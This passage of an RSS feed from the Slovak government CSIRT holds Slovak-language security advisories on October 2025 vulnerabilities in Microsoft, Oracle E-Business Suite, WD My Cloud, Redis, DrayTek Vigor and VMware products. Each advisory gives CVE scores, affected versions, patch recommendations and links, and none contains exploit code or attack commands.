<li>Microsoft Visual Studio 2022 version 17.12</li>



<li>Microsoft Visual Studio 2022 version 17.14</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>microsoft/playwright</li>



<li>Office Online Server</li>



<li>PowerShell 7.4</li>



<li>PowerShell 7.5</li>



<li>Remote Desktop client for Windows Desktop</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows 11 Version 25H2 for ARM64-based Systems</li>



<li>Windows 11 Version 25H2 for x64-based Systems</li>



<li>Windows App Client for Windows Desktop</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>



<li>Xbox Gaming Services</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>V rámci októbrového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 172 zraniteľností. Z nich 8 bolo zaradených do kategórie kritické a 162 bolo vyhodnotených ako vysoko závažné („Important“). Kritické zraniteľnosti umožňujú vzdialene vykonávať kód a eskalovať oprávnenia.</p>



<p>Microsoft opravil aj nasledovných 6 aktívne zneužívaných zraniteľností.</p>



<p><strong>CVE-2025-24052 a CVE-2025-24990</strong> (CVSS skóre 7,8)</p>



<p>Vysoko závažné zraniteľnosti natívneho ovládača Windows pre zariadenia Agere Modem súvisia s pretečením medzipamäte na zásobníku a dereferenciou nedôveryhodného ukazovateľa. Umožňujú eskalovať oprávnenia na úroveň administrátora. Zneužiť ich možno, aj keď systém nepoužíva daný modem. Microsoft odstránil tento ovládač (súbor <em>ltmdm64.sys</em>) zo systému.</p>



<p><strong>CVE-2025-59230</strong><strong> (CVSS skóre 7,8)</strong></p>



<p>Vysoko závažná zraniteľnosť sa nachádza v komponente Windows Remote Access Connection Manager. Kvôli nedostatočnej kontrole prístupov dovoľuje lokálnemu autorizovanému útočníkovi eskalovať svoje oprávnenia na úroveň SYSTEM.</p>



<p><strong>CVE-2025-47827</strong> (CVSS skóre 4,6)</p>



<p>Zraniteľnosť strednej závažnosti vo verziách IGEL OS starších ako 11 umožňuje obísť prvok Secure Boot. Chyba sa nachádza v ovládači igel-flash-driver, ktorý nesprávne overuje kryptografický podpis, bez ohľadu na jeho expiráciu. Jej zneužitím by útočník mohol napríklad úspešne načítať neoverený image SquashFS.</p>



<p><strong>CVE-2025-0033</strong> (CVSS skóre 8,2)</p>



<p>Vysoko závažná zraniteľnosť procesorov AMD EPYC využívajúcich technológiu Secure Encrypted Virtualization – Secure Nested Paging (SEV-SNP) dovoľuje vzdialené vykonávanie kódu. Súvisí so vznikom súbehu pri inicializácii RMP (Reverse Map Table), ktorý môže lokálny útočník s vysokými oprávneniami zneužiť cez virtuálny stroj na manipuláciu vstupov RMP a integrity hosťovskej pamäte SEV-SNP. Spoločnosť Microsoft pracuje aj na opravách zraniteľnosti pre Azure Confidential Computing.</p>



<p><strong>CVE-2025-2884</strong><strong> (CVSS skóre 5,3)</strong></p>



<p>Zraniteľnosť v špecifikácii TCG TPM2.0 umožňuje prístup k citlivým informáciám. Nachádza sa v implementácii pomocnej funkcie CryptHmacSign, kde je možné čítať obsah pamäte mimo povolené hodnoty.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo <a href="https://msrc.microsoft.com/update-guide/">stránky výrobcu</a>. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac október a Mode „Update Tuesday“. Bližšie informácie nájdete aj <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Oct">tu</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/">https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-us">https://msrc.microsoft.com/update-guide/en-us</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24990">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24990</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59230">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59230</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47827">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47827</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-0033">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-0033</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24052">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24052</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-2884">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-2884</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2902/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – september 2025</title>
		<link>/posts/2896</link>
					<comments>/posts/2896#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 14 Oct 2025 13:08:57 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2896</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/10/MS202509.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 09/2025 PDF (1 776 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2896/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v Oracle E-Business Suite</title>
		<link>/posts/2894</link>
					<comments>/posts/2894#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 14 Oct 2025 12:30:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[E-Business Suite]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Oracle]]></category>
		<guid isPermaLink="false">/?p=2894</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Oracle-Logo-1024x576.jpg" alt="" /></p>Spoločnosť Oracle vydala bezpečnostnú aktualizáciu na svoj produkt E-Business Suite, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-61884 by vzdialený neautentifikovaný útočník...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Oracle-Logo-1024x576.jpg" alt="" /></p>
<p><strong>Spoločnosť Oracle vydala bezpečnostnú aktualizáciu na svoj produkt E-Business Suite, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-61884 by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na kompromitáciu Oracle Configurator a získanie neoprávneného prístupu k citlivým údajom.</strong><br><strong>[aktualizácia 21.10.2025] zraniteľnosť <strong>CVE-2025-61884</strong></strong> <strong>bola pridaná do zoznamu aktívne zneužívaných    </strong></p>



<p></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Oracle E-Business Suite 12.2.3-12.2.14</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-61884</strong><strong> (CVSS v3.1 skóre 7,5)</strong></p>



<p>Vysoko závažná zraniteľnosť v&nbsp;komponente Runtime UI aplikácie Oracle Configurator, ktorá je súčasťou Oracle E-Business Suite. Neautentifikovaný útočník so sieťovým prístupom môže jej zneužitím cez protokol HTTP získať prístup k&nbsp;citlivým informáciám, resp. všetkým dátam dostupným pre Oracle Configurator. Bližšie informácie o&nbsp;zraniteľnosti neboli zverejnené.</p>



<p>[Aktualizácia] Aktuálne prebieha kampaň skupiny Clop zameraná na krádež údajov zákazníkov Oracle. Skupina Clop potvrdila, že v rámci útokov zneužíva zraniteľnosť CVE-2025-61884.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na opravené verzie podľa <a href="https://support.oracle.com/rs?type=doc&amp;id=3107176.1">dokumentácie spoločnosti Oracle</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.oracle.com/security-alerts/alert-cve-2025-61884.html">https://www.oracle.com/security-alerts/alert-cve-2025-61884.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61884">https://nvd.nist.gov/vuln/detail/CVE-2025-61884</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2025-61884/">https://arcticwolf.com/resources/blog/cve-2025-61884/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/oracles-silently-fixes-zero-day-exploit-leaked-by-shinyhunters/">https://www.bleepingcomputer.com/news/security/oracles-silently-fixes-zero-day-exploit-leaked-by-shinyhunters/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2894/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v sieťových úložiskách WD My Cloud umožňuje vzdialené vykonanie kódu</title>
		<link>/posts/2891</link>
					<comments>/posts/2891#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 13 Oct 2025 14:45:32 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[My Cloud]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Western Digital]]></category>
		<guid isPermaLink="false">/?p=2891</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/Western_Digital-1024x631.png" alt="" /></p>Spoločnosť Western Digital vydala aktualizácie firmvéru viacerých modelov zariadení NAS (Network Attached Storage) série My Cloud, ktoré opravujú kritickú zraniteľnosť....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/Western_Digital-1024x631.png" alt="" /></p>
<p><strong>Spoločnosť Western Digital vydala aktualizácie firmvéru viacerých modelov zariadení NAS (Network Attached Storage) série My Cloud, ktoré opravujú kritickú zraniteľnosť. CVE-2025-30247 možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong><u>Zraniteľné systémy:</u></strong></p>



<ul>
<li>NAS zariadenia Western Digital My Cloud PR2100, My Cloud PR4100, My Cloud EX4100, My Cloud EX2 Ultra, My Cloud Mirror Gen 2, My Cloud EX2100, My Cloud WDBCTLxxxxxx-10, My Cloud s&nbsp;firmvérom vo verziách starších ako 5.31.108</li>



<li>NAS zariadenia Western Digital My Cloud DL2100, My Cloud DL4100 vo všetkých verziách firmvéru (jedná sa o&nbsp;produkty s&nbsp;ukončenou podporou)</li>
</ul>



<p><strong><u>Opis zraniteľnosti:</u></strong></p>



<p><strong>CVE-2025-30247 </strong>(CVSSv4.0 skóre 9,3)</p>



<p>Kritická zraniteľnosť sa nachádza v používateľskom rozhraní a spočíva v nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek HTTP POST mohol zneužiť na <strong>injekciu príkazov operačného systému</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu firmvéru NAS na verziu 5.31.108. Medzi zraniteľnými modelmi sú aj dva s ukončenou technickou podporou (My Cloud DL4100, My Cloud DL2100). V prípade týchto zariadení odporúčame urýchlenú migráciu na alternatívne produkty s platnou podporou. Zraniteľnosť je možné dočasne mitigovať aj odpojením zariadenia od internetu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.westerndigital.com/support/product-security/wdc-25006-western-digital-my-cloud-os-5-firmware-5-31-108">https://www.westerndigital.com/support/product-security/wdc-25006-western-digital-my-cloud-os-5-firmware-5-31-108</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/cve-2025-30247">https://nvd.nist.gov/vuln/detail/cve-2025-30247</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-wd-my-cloud-bug-allows-remote-command-injection/">https://www.bleepingcomputer.com/news/security/critical-wd-my-cloud-bug-allows-remote-command-injection/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2891/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Redis umožňuje vzdialené vykonanie kódu</title>
		<link>/posts/2888</link>
					<comments>/posts/2888#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 10 Oct 2025 15:32:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Redis]]></category>
		<guid isPermaLink="false">/?p=2888</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/Redis-1024x694.png" alt="" /></p>Vývojári in-memory NoSQL úložiska Redis vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-49844 by vzdialený autentifikovaný útočník mohol...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/Redis-1024x694.png" alt="" /></p>
<p><strong>Vývojári in-memory NoSQL úložiska Redis vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-49844 by vzdialený autentifikovaný útočník mohol zneužiť na vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Redis Software, vo všetkých verziách</li>



<li>Redis OSS/CE/Stack with Lua scripting, vo všetkých verziách</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-49844 </strong>(CVSSv3.1 skóre 9,9)</p>



<p>Kritická zraniteľnosť s&nbsp;identifikátorom CVE-2025-49844 (alias RediShell) sa nachádza v&nbsp;rámci <strong>interpretera</strong> <strong>Lua </strong>a spočíva v použití odalokovaného miesta v&nbsp;pamäti. Vzdialený autentifikovaný útočník by ju prostredníctvom špeciálne vytvorených skriptov Lua mohol zneužiť na <strong>únik z Lua sandboxu</strong>, <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>. Zraniteľnosť odhalili bezpečnostní výskumníci z&nbsp;<a href="https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844">WIZ</a> na hackerskej súťaži Pwn2Own v&nbsp;Berlíne.</p>



<p><strong>Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je povolené vykonávanie skriptov Lua. Skripty Lua sú v predvolenej konfigurácii zapnuté. Z dôvodu nesprávnej konfigurácie je veľké množstvo inštancií dostupných z internetu prevádzkovaných bez autentifikácie, čo ich vystavuje priamemu riziku zneužitia tejto zraniteľnosti.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu</p>



<ul>
<li>Redis Software na verzie 7.22.2-12, 7.8.6-207, 7.4.6-272, 7.2.4-138, 6.4.2-131 alebo novšie</li>



<li>Redis OSS/CE so skriptovaním Lua na verzie 8.2.2, 8.0.4, 7.4.6, 7.2.11. alebo novšie</li>



<li>Redis Stack so skriptovaním Lua na verzie 7.4.0-v7, 7.2.0-v19 alebo novšie</li>
</ul>



<p>V&nbsp;prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno mitigovať zavedením ACL (Access Control List) zakazujúceho vykonanie príkazov EVAL a&nbsp;EVALSHA.</p>



<p>Rovnako odporúčame na inštanciách vyžadovať autentifikáciu a&nbsp;neprevádzkovať ich voľne prístupné z&nbsp;internetu. Ak systémy musia byť prístupné, použite VPN alebo prostredníctvom sieťových a&nbsp;bezpečnostných prvkov limitujte prístup len na dôveryhodné siete. &nbsp;</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/redis/redis/security/advisories/GHSA-4789-qfc9-5f9q">https://github.com/redis/redis/security/advisories/GHSA-4789-qfc9-5f9q</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49844">https://nvd.nist.gov/vuln/detail/CVE-2025-49844</a></li>



<li><a href="https://redis.io/blog/security-advisory-cve-2025-49844/">https://redis.io/blog/security-advisory-cve-2025-49844/</a></li>



<li><a href="https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844">https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/redis-warns-of-max-severity-flaw-impacting-thousands-of-instances/">https://www.bleepingcomputer.com/news/security/redis-warns-of-max-severity-flaw-impacting-thousands-of-instances/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2888/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>DrayTek opravil závažnú zraniteľnosť vo webovom rozhraní routerov Vigor</title>
		<link>/posts/2885</link>
					<comments>/posts/2885#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 10 Oct 2025 15:30:30 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[DrayTek]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Vigor]]></category>
		<guid isPermaLink="false">/?p=2885</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/DrayTek-1024x637.png" alt="" /></p>Spoločnosť DrayTek vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť viacerých routerov Vigor. CVE-2025-10547 možno zneužiť na vzdialené vykonanie kódu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/DrayTek-1024x637.png" alt="" /></p>
<p><strong>Spoločnosť DrayTek vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť viacerých routerov Vigor. CVE-2025-10547 možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Routery DrayTek Vigor1000B s&nbsp;firmvérom vo verzii staršej ako 4.4.3.6</li>



<li>Routery DrayTek Vigor2962, Vigor3910 a Vigor3912 s&nbsp;firmvérom vo verzii staršej ako 4.4.3.6 alebo 4.4.5.1</li>



<li>Routery DrayTek Vigor2135, Vigor2763, Vigor2765, Vigor2766, Vigor2865 Series, Vigor2865 LTE Series, Vigor2865L-5G Series, Vigor2866 Series, Vigor2866 LTE Series, Vigor2927 Series, Vigor2927 LTE Series a Vigor2927L-5G Series s&nbsp;firmvérom vo verzii staršej ako 4.5.1</li>



<li>Routery DrayTek Vigor2915 Series s&nbsp;firmvérom vo verzii staršej ako 4.4.6.1</li>



<li>Routery DrayTek Vigor2862 Series, Vigor2862 LTE Series, Vigor2926 Series a Vigor2926 LTE Series s&nbsp;firmvérom vo verzii staršej ako 3.9.9.12</li>



<li>Routery DrayTek Vigor2952, Vigor2952P a Vigor3220 s&nbsp;firmvérom vo verzii staršej ako 3.9.8.8</li>



<li>Routery DrayTek Vigor2860 Series, Vigor2860 LTE Series, Vigor2925 Series a Vigor2925 LTE Series s&nbsp;firmvérom vo verzii staršej ako 3.9.8.6</li>



<li>Routery DrayTek Vigor2133 Series, Vigor2762 Series aVigor2832 Series s&nbsp;firmvérom vo verzii staršej ako 3.9.9.4</li>



<li>Routery DrayTek Vigor2620 Series a VigorLTE 200n s&nbsp;firmvérom vo verzii staršej ako 3.9.9.5</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-10547 </strong>(CVSSv3.1 skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť CVE-2025-10547 sa nachádza vo <strong>webovom používateľskom rozhraní (WebUI)</strong> a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP/HTTPS požiadaviek mohol zneužiť na <strong>poškodenie obsahu pamäte</strong>, <strong>zneprístupnenie služby</strong> a <strong>vzdialené vykonanie kódu</strong>. Chyba súvisí s&nbsp;neinicializovanou hodnotou na zásobníku a&nbsp;dovoľuje použiť funkciu <em>free()</em> na ľubovoľnom mieste pamäte.</p>



<p>Pozn.: Routery DrayTek Vigor sú rozšírené najmä v&nbsp;infraštruktúre malých a&nbsp;stredných podnikov a&nbsp;telekomunikačných operátorov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru Vigor routerov na verzie špecifikované <a href="https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities">výrobcom</a>, ktoré môžete nájsť aj v&nbsp;časti „Zraniteľné systémy“ tohto varovania. Výrobca okrem aktualizácie systémov odporúča limitovať prístup k&nbsp;webovému rozhraniu len na dôveryhodné IP adresy. Používateľské a administrátorské rozhrania sieťových prvkov by nemali byť prevádzkované voľne prístupné z internetu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities">https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities</a></li>



<li><a href="https://kb.cert.org/vuls/id/294418">https://kb.cert.org/vuls/id/294418</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/draytek-warns-of-remote-code-execution-bug-in-vigor-routers/">https://www.bleepingcomputer.com/news/security/draytek-warns-of-remote-code-execution-bug-in-vigor-routers/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2885/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažné zraniteľnosti vo VMware NSX a vCenter umožňujú enumeráciu používateľov a injekciu SMTP</title>
		<link>/posts/2881</link>
					<comments>/posts/2881#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 10 Oct 2025 15:27:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NSX]]></category>
		<category><![CDATA[vCenter]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=2881</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť Broadcom vydala bezpečnostné aktualizácie VMware NSX a VMware vCenter, ktoré opravujú 3 vysoko závažné zraniteľnosti. Zraniteľnosti v&#160;NSX možno zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Spoločnosť Broadcom vydala bezpečnostné aktualizácie VMware NSX a VMware vCenter, ktoré opravujú 3 vysoko závažné zraniteľnosti. Zraniteľnosti v&nbsp;NSX možno zneužiť na enumeráciu používateľov a&nbsp;následnú realizáciu brute-force alebo slovníkových útokov. Zraniteľnosť vo VMware vCenter umožňuje injektovať hlavičky SMTP.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>vCenter:</p>



<ul>
<li>VMware vCenter 8.0 bez bezpečnostnej záplaty <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/vcenter-server-update-and-patch-release-notes/vsphere-vcenter-server-80u3g-release-notes.html">8.0 U3g</a></li>



<li>VMware vCenter 7.0 bez bezpečnostnej záplaty <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/vcenter-server-update-and-patch-releases/vsphere-vcenter-server-70u3w-release-notes.html">7.0 U3w</a></li>



<li>VMware Cloud Foundation, VMware vSphere Foundation 9.X.X.X vo verziách starších ako <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-9-0-and-later/9-0/release-notes/vmware-cloud-foundation-9-0-1-release-notes/vcenter-9-0-1-0000.html">9.0.1.0</a></li>



<li>VMware Cloud Foundation 5.X vo verziách starších ako <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vcf/vcf-5-2-and-earlier/5-2/vcf-release-notes/vmware-cloud-foundation-522-release-notes.html">5.2.2</a></li>



<li>VMware Cloud Foundation 4.5.X bez upgradu na <a href="https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/vcenter-server-update-and-patch-releases/vsphere-vcenter-server-70u3w-release-notes.html">7.0 U3w</a></li>



<li>VMware Telco Cloud Platform 5.X, 4.X, 3.x, 2.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article/411508">KB411508</a></li>



<li>VMware Telco Cloud Infrastructure 3.X, 2.X bez bezpečnostnej záplaty <a href="https://knowledge.broadcom.com/external/article/411508">KB411508</a></li>
</ul>



<p>NSX:</p>



<ul>
<li>VMware NSX 4.2.X vo verziách starších ako 4.2.2.2, 4.2.3.1</li>



<li>VMware NSX 4.1.X, 4.0.X vo verziách starších ako 4.1.2.7</li>



<li>NSX-T 3.X vo verziách starších ako 3.2.4.3</li>



